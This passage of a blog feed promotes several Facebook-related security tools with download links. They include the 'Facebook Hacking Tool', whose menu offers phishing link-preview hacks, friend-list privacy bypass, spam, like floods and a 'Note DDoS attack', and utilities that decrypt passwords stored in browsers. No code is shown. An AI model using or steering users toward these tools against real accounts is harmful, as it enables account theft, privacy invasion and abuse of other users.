<li style="text-align: justify;">3) Send friendship requests (Test Accounts)</li>
<li style="text-align: justify;">4) Accept friendship requests (Test Accounts)</li>
<li style="text-align: justify;">5) Connect all the accounts of the database</li>
<li style="text-align: justify;">6) Link Preview hack (Simple web version)</li>
<li style="text-align: justify;">7) Link Preview hack (Youtube version)</li>
<li style="text-align: justify;">8) Youtube hijack</li>
<li style="text-align: justify;">9) Private message, Link Preview hack (Simple web version)</li>
<li style="text-align: justify;">10) Private message, Link Preview hack (Youtube version)</li>
<li style="text-align: justify;">11) NEW Like flood</li>
<li style="text-align: justify;">12) Publish a post as an App (App Message Spoof)</li>
<li style="text-align: justify;">13) Bypass friendship privacy</li>
<li style="text-align: justify;">14) Bypass friendship privacy with graph support</li>
<li style="text-align: justify;">15) Analyze an existing graph</li>
<li style="text-align: justify;">16) Link to disclosed friendships</li>
<li style="text-align: justify;">17) Print database status</li>
<li style="text-align: justify;">18) Increase logging level globally</li>
<li style="text-align: justify;">19) Set global login (Credentials stored in memory - Danger)</li>
<li style="text-align: justify;">20) Print dead attacks :\'( </li>
<li style="text-align: justify;">21) Send friend request to disclosed friend list from your account</li>
<li style="text-align: justify;">22) Bypass friendship (only .dot without graph integration)</li>
<li style="text-align: justify;">23) Note DDoS attack</li>
<li style="text-align: justify;">24) Old Like Flood (Not working)</li>
<li style="text-align: justify;">25) NEW! SPAM any fanpage inbox</li>
<li style="text-align: justify;">26) Bypass - database support (Beta)</li>
<li style="text-align: justify;">27) Logout all your friends - FB blackout </li>
<li style="text-align: justify;">28) Close the application</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<a href="https://github.com/chinoogawa/fbht" target="_blank"><b><span style="font-size: x-large;">Download FBHT v3.0</span></b></a></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-84510125479761487572014-08-19T20:19:00.000-04:002014-08-19T21:24:29.764-04:00FBCacheView v1.03 - View Facebook images stored in the cache of your Web browser <div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-0O4Rv21ccqc/U_P4FaPW0sI/AAAAAAAADAw/DQQC27o4ebs/s1600/fbcacheview.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-0O4Rv21ccqc/U_P4FaPW0sI/AAAAAAAADAw/DQQC27o4ebs/s1600/fbcacheview.png" height="374" width="640" /></a></div>
<br />
<div style="text-align: justify;">
FBCacheView is a simple tool that scans the cache of your Web browser
(Internet Explorer, Firefox, or Chrome),
and lists all images displayed in Facebook pages that you previously
visited, including profile pictures, images uploaded to Facebook,
and images taken from other Web sites.
For every Facebook image, the following information is displayed:
URL of the image, Web browser that was used to visit the page, image
type, date/time of the image, visit time, image file size,
and external URL (For images taken from another Web site).</div>
<a name='more'></a>
<br />
<h4 class="utilsubject" style="text-align: justify;">
<span class="Apple-style-span" style="font-size: large;">
System Requirements And Limitations</span></h4>
<ul>
<li style="text-align: justify;">This utility works in any version of Windows, starting from Windows XP and up to Windows 8.
Both 32-bit and 64-bit systems are supported.
</li>
<li style="text-align: justify;">The following Web browsers are supported: Internet Explorer, Mozilla Firefox, SeaMonkey, and Google Chrome.
Opera is not supported because it stores the JPEG images in Webp format.
</li>
<li style="text-align: justify;">FBCacheView won't work if you configure your Web browser to clear the cache after closing it.
</li>
<li style="text-align: justify;">It's recommended to close all windows of your Web browser
before using FBCacheView, to ensure that all cache files are saved to
the disk. </li>
</ul>
<br />
<h4 class="utilsubject" style="text-align: justify;">
<span class="Apple-style-span" style="font-size: large;">Start Using FBCacheView</span></h4>
<div style="text-align: justify;">
FBCacheView doesn't require any installation process or additional DLL files.
In order to start using it, simply run the executable file - FBCacheView.exe</div>
<div style="text-align: justify;">
After running it, FBCacheView begins to scan the cache of your Web
browser and displays the list of all images loaded from Facebook Web
pages.
You may need to wait up to a few minutes until the scanning process is
finished.
After the scanning process is finished, you can also watch the image in
the lower pane of FBCacheView, by selecting the desired item in the
upper pane.
</div>
<div style="text-align: justify;">
If from some reason FBCacheView fails to detect the cache of your Web
browser properly, you can go to 'Advanced Options' window (F9), and
choose the desired cache folders to scan
for each Web browser.
</div>
<div style="text-align: justify;">
<br /></div>
<h4 class="utilsubject" style="text-align: justify;">
<span class="Apple-style-span" style="font-size: large;">Columns Description</span></h4>
<ul>
<li style="text-align: justify;"><span class="special2">URL:</span>
The URL of the image on Facebook.
</li>
<li style="text-align: justify;"><span class="special2">Web Browser:</span>
The Web browser that stores the specified Facebook image file in the cache.
</li>
<li style="text-align: justify;"><span class="special2">Image Type:</span>
The type of the image: Profile image, uploaded image, or external image taken from another Web site.
For 'External Image' type, the original URL of the image is displayed on 'External URL' column.
</li>
<li style="text-align: justify;"><span class="special2">Image Time:</span>
The date/time of the image as returned by the Web server of Facebook.
This column usually represents the time that the image was uploaded to Facebook.
</li>
<li style="text-align: justify;"><span class="special2">Browsing Time:</span>
The last time that the specified Facebook image was loaded by your Web browser.
</li>
<li style="text-align: justify;"><span class="special2">File Size:</span>
The file size of the image.
</li>
<li style="text-align: justify;"><span class="special2">Filename:</span>
The full path of the image filename in the cache of your Web browser.
</li>
<li style="text-align: justify;"><span class="special2">External URL:</span>
Displays the original URL of the image (Only for external images) </li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<b><span class="Apple-style-span" style="font-size: x-large;"><a href="http://www.nirsoft.net/utils/facebook_cache_viewer.html" target="_blank">Download FBCacheView v1.03</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-12053648982744918452014-08-05T22:59:00.000-04:002014-08-05T22:59:37.358-04:00Facebook Password Remover - All-in-one Facebook Login Password Removal Tool<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-yRSCyR9LTOQ/U-GZh2VNN5I/AAAAAAAAC8c/cWfBO7pH6gg/s1600/facebook_password_remover.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-yRSCyR9LTOQ/U-GZh2VNN5I/AAAAAAAAC8c/cWfBO7pH6gg/s1600/facebook_password_remover.jpg" height="501" width="640" /></a></div>
<br />
<div style="text-align: justify;">
<span class="highlight">Facebook Password Remover</span> is the free all-in-one tool to quickly remove the stored Facebook Login passwords from your system. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This helps you to delete any accidently (or otherwise) stored Facebook password on any public/shared computers so that your <strong>Facebook account</strong> remains safe.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
Currently it supports Facebook password removal from following applications,</div>
<ul style="font-weight: bold; line-height: 180%; padding-left: 50px;">
<li style="text-align: justify;">Firefox</li>
<li style="text-align: justify;"> Internet Explorer [v7.x - v10.x]</li>
<li style="text-align: justify;"> Google Chrome</li>
<li style="text-align: justify;"> Google Chrome Canary/SXS</li>
<li style="text-align: justify;"> CoolNovo Browser</li>
<li style="text-align: justify;"> Opera Next </li>
<li style="text-align: justify;"> Comodo Dragon Browser</li>
<li style="text-align: justify;"> SeaMonkey Browser</li>
<li style="text-align: justify;"> SRWare Iron Browser</li>
<li style="text-align: justify;"> Flock Browser</li>
</ul>
<div style="text-align: justify;">
One of the unique feature of this tool is that it allows you to remove even the <strong>encrypted Facebook passwords</strong>, belonging to any user account either on local system or any other computer. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Before removing the passwords, you can also take a <strong>backup</strong> of recovered Facebook password list in HTML/XML/TEXT format. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Facebook Password Remover is fully <strong>Portable</strong> and works on both 32-bit/64-bit platforms starting from Windows XP to <strong>Windows 8.</strong></div>
<br />
<br />
<b><span class="Apple-style-span" style="font-size: large;">Features</span></b><br />
<ul style="line-height: 180%; padding-left: 30px;">
<li>Instantly decrypt and show all the Facebook passwords on your system</li>
<li> Remove either selected ones or all the stored Facebook passwords with just a click</li>
<li> Support recovery and removal from latest versions of Applications</li>
<li> Create backup password report in HTML/XML/TEXT format</li>
<li> Auto detects the current password store location</li>
<li> Remove password from any user account on local or another system</li>
<li> Remove even encrypted Facebook passwords</li>
<li> Free and Easy to Use GUI based Tool</li>
<li> Fully portable, can be run anywhere without JAVA, .NET components</li>
<li> Includes Installer for local Installation & Uninstallation</li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span class="Apple-style-span" style="font-size: large;"><a href="http://securityxploded.com/facebook-password-remover.php" target="_blank">Download Facebook Password Remover</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-5343065624630759532014-04-01T22:12:00.000-03:002014-04-01T22:12:00.859-03:00FBCacheView - Shows Facebook images stored in the cache of your Web browser<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-bwFt81SIIbA/UzTMIL-S03I/AAAAAAAACSc/IKLDYsBtlo8/s1600/fbcacheview.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-bwFt81SIIbA/UzTMIL-S03I/AAAAAAAACSc/IKLDYsBtlo8/s1600/fbcacheview.png" height="374" width="640" /></a></div>
<br />
<div style="text-align: justify;">
FBCacheView is a simple tool that scans the cache of your Web browser (Internet Explorer, Firefox, or Chrome), and lists all images displayed in Facebook pages that you previously visited, including profile pictures, images uploaded to Facebook, and images taken from other Web sites. For every Facebook image, the following information is displayed: URL of the image, Web browser that was used to visit the page, image type, date/time of the image, visit time, image file size, and external URL (For images taken from another Web site).</div>
<a name='more'></a><br />
<br />
<div style="text-align: center;">
<span class="Apple-style-span" style="font-size: x-large;"><a href="http://www.nirsoft.net/utils/facebook_cache_viewer.html" target="_blank">Download FBCacheView</a></span></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-59650211243673297022014-02-04T20:38:00.000-03:002014-02-04T20:38:58.879-03:00[FBHT v2.0] Facebook Hacking Tool
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-sUT0BMtIOGw/UvFs5JVmS2I/AAAAAAAABwY/Nh6nxEMJLfE/s1600/Facebook+Hacking+Tool.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-sUT0BMtIOGw/UvFs5JVmS2I/AAAAAAAABwY/Nh6nxEMJLfE/s1600/Facebook+Hacking+Tool.jpg" height="400" width="640" /></a></div>
<br />
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-weight: bold;"><br /></span></div>
<div style="text-align: justify;">
<strong>FBHT</strong> (<em><strong>F</strong>ace<strong>b</strong>ook <strong>H</strong>acking<strong> T</strong>ool</em>) is an open-source tool written in Python that exploits multiple vulnerabilities on the Facebook platform</div>
<br />
<a name='more'></a><br />
The tool provides:<br />
<ul>
<li><strong></strong><code>Tests account handling (Create, Delete, Friend, Accept)</code><strong></strong></li>
<li><code>Youtube videos phishing</code></li>
<li><strong></strong><code>Facebook links preview modification</code></li>
<li><strong></strong><code>Friends list privacy bypass</code><strong></strong></li>
<li><code>Graph support</code></li>
<li><strong></strong><code>Facebook links preview modification</code></li>
<li><strong></strong><code>More...</code></li>
</ul>
<br />
<div style="text-align: center;">
<b><span class="Apple-style-span" style="font-size: x-large;"><a href="https://github.com/chinoogawa/fbht" target="_blank">Download FBHT v2.0</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-33599461231982413982013-10-21T21:42:00.001-03:002013-10-21T21:42:29.032-03:00[Facebook Password Decryptor v5.5 ] Facebook Password Recovery Software<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-kGLqfAl4Ir8/UmXJ1vFswRI/AAAAAAAABHs/uC_Rx5ikNec/s1600/facebookpassworddecryptor_main_big.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="488" src="http://4.bp.blogspot.com/-kGLqfAl4Ir8/UmXJ1vFswRI/AAAAAAAABHs/uC_Rx5ikNec/s640/facebookpassworddecryptor_main_big.jpg" width="640" /></a></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Facebook Password Decryptor</b> is the FREE software to instantly recover
Facebook account passwords stored by
popular Web Browsers and Messengers.</div>
<div style="text-align: justify;">
<br /></div>
<br />
<div style="text-align: justify;">
It is one of our most popular software with over <strong>One Million Downloads</strong> worldwide.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
Here is the complete list of
supported applications. </div>
<ul style="font-size: small; font-weight: bold; line-height: 180%;">
<li style="text-align: justify;">Internet Explorer (v4.0 - v10.0) </li>
<li style="text-align: justify;">Firefox</li>
<li style="text-align: justify;">Google Chrome</li>
<li style="text-align: justify;">Chrome Canary/SXS</li>
<li style="text-align: justify;">CoolNovo Browser</li>
<li style="text-align: justify;">Opera Browser</li>
<li style="text-align: justify;">Apple Safari</li>
<li style="text-align: justify;">Flock Browser</li>
<li style="text-align: justify;">Comodo Dragon Browser</li>
<li style="text-align: justify;">SeaMonkey Browser</li>
<li style="text-align: justify;">Paltalk Messenger</li>
<li style="text-align: justify;">Miranda Messenger</li>
</ul>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It is very easy to use and particularly more useful for Penetration
testers and Forensic
investigators.</div>
<div style="text-align: justify;">
<br /></div>
<div style="color: green; text-align: justify;">
For command-line version, check out our new tool - <a href="http://securityxploded.com/facebook-password-dump.php"><strong>Facebook Password Dump</strong></a>.</div>
<div style="color: green;">
<br /></div>
<div style="color: green; text-align: center;">
<span class="Apple-style-span" style="font-size: x-large;"> <span class="Apple-style-span" style="color: black;"><a href="http://securityxploded.com/download.php#facebookpassworddecryptor"><span style="font-weight: bold;">Facebook Password Decryptor
v5.5</span></a></span></span></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-26599799433821732502013-09-09T00:57:00.001-03:002013-09-09T00:57:54.928-03:00[Facebook Password Dump] Tool to instantly recover your lost Facebook password<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-yJO6mcJOxvc/Ui1HF3FGfvI/AAAAAAAAA-c/K9y-BLWJkfQ/s1600/facebookpassworddump_mainscreen_big.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="418" src="http://1.bp.blogspot.com/-yJO6mcJOxvc/Ui1HF3FGfvI/AAAAAAAAA-c/K9y-BLWJkfQ/s640/facebookpassworddump_mainscreen_big.jpg" width="640" /></a></div>
<b><br /></b>
<strong>Facebook Password Dump</strong> is the command-line tool to instantly recover your lost Facebook password from popular web browsers and messengers.<br />
<br />
<br />
It <strong>automatically</strong> discovers installed applications on your system and recovers all the stored Facebook login passwords within seconds.<br />
<a name='more'></a>
<br />
Being <strong>command-line</strong> tool makes it ideal tool for penetration testers and forensic investigators. For GUI version check out the <a href="http://securityxploded.com/facebookpassworddecryptor.php">Facebook Password Decryptor.</a><br />
<br />
<div style="text-align: center;">
<a href="http://securityxploded.com/download.php#facebookpassworddump" target="_blank"><span style="font-size: x-large; font-weight: bold;">Download FacebookPasswordDump v1.0</span></a></div>
Unknownnoreply@blogger.com